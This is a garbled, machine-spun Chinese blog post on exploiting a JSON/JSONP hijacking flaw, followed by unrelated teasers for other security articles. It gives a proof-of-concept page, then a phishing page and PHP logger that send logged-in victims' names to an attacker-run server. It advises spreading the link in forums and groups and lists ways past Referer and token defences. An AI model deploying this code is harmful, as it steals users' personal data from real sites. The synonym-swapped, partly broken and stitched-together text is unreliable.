*** ON Hijacking缝隙的具体使用,有点相似与CSRF,不过原理使用 *** 不同,在这边文章我侧重解说json跨域绑架的使用环境建立与 *** 。
0×01缝隙的发掘
一般发掘的过程中,burpsuite署理的History做寻觅,过滤剩余不可能存在缝隙的一些链接,如下图所示:
咱们在回来包中json格局发现了如下的灵敏信息(用户Id,用户名,用户手机号码)。
0×02缝隙的证明之poc
提交缝隙,poc在众测时要分秒必争,所以这边用了最精简的一个POC。
假设回来的数据为:
txf({“data”:{“name”:”唐晓峰”}});
html>
head>
script>
function txf(a){
alert(a.data.name);
}
script>
script src=http://***.***.**/wm/User/getUserInfo?callback=txf>script>
body>
html>
即可如下弹窗:
0×03缝隙的使用之垂钓
1.预备一台web服务器,我直接phpstudy搭的。
附上服务器端的代码
json.php
$nickname=$_GET['name'];
$fp = fopen('info.txt','a');
$flag = fwrite($fp, "姓名: ".$name."rn");
?>html>
垂钓.html
head> title>txftitle>script> var xmlhttp; function txf(a) { xmlhttp=new XMLHttpRequest() var x="http://***.***.***/json.php?name="+a.data.name; xmlhttp.open("GET", x, true); xmlhttp.send(); }script>>script src=http://***.***.***?callback=txf>script>head>body> textarea>垂钓啦,傻瓜textarea>>body>html>
把垂钓链接http://***.***.***/垂钓.html发给该网站已登陆的用户,如论坛,社区 *** 群,社区贴吧等,服务端即可获取到很多用户灵敏数据。
这边以hackone的一个项目为例:
0×04缝隙的修正与绕过
由于这个比如是小伙伴发过来的还没修正,所以都脱敏了,咱们再从开发修正的视点去考虑怎么绕过修正。
1.Referer白名单
子域名绕过,文件名绕过,空Referer绕过
2.添加token认证
token满足杂乱或许服务端加密,咱们无法绕过,假如token很简单,如纯数字,咱们能够测验遍历绕过
3.接口禁用
无敌的操作,无法绕过
总结:
十分有意思的一个绑架,曾经没有使用过,仅仅知道有这么个东西,一般众测或许项目上遇到我都是直接截图,声明一波灵敏信息走漏,然后就完毕了,很低危,这次实战使用之后,略微提高了一点逼格。
概述 WEB进犯是十几年来黑客进犯的干流技能,国内的大厂们早已把WAF作为安全基础设施的标配,市面上也有许多安全厂商供给了WAF产品或云WAF服务。 关于没有自己安全团队,却又饱尝sql注入、xss...
二十多年来,跨站脚本(简称 XSS)缝隙一直是干流网站的心头之痛。为什么过了这么久,这些网站仍是对此类缝隙束手无策呢? 关于最近 eBay 网站曝出的跨站脚本缝隙,你有什么主意?为什么会呈现这样的漏...
花费了点时刻研讨了下PHP序列化,写在这儿。一是便利自己知识点回忆,二是协助相同有疑问的人,欢迎纠正过错,不喜勿喷. 0×01.确认装备文件 首要体系运用的ubuntu apt-get install...
从这一章开端,正式进入了进犯阶段。BeEF供给了很多的进犯模块,能够直接运用。除了已有的模块,BeEF还供给了API,能够运用API来自行开发新的进犯模块。这一章,要介绍怎么绕过同源战略,还会介绍Be...
榜首眼看这个应战,通常是过滤一些字符或许添加一些约束来阻挠指令履行,我经过输入&id到addr域,成功回来履行成果,能够确认这是一道指令履行的应战题。 下一步咱们来找出过滤和约束。经过测验,咱...
Metasploit是一个十分受欢迎的浸透测验结构,被视为安全测验人员手中的一把利器。但在另一方面由于他过于强壮,因而也常常被一些歹意攻击者所运用。当然,在本文咱们首要评论的是关于内存取证,这对于咱们...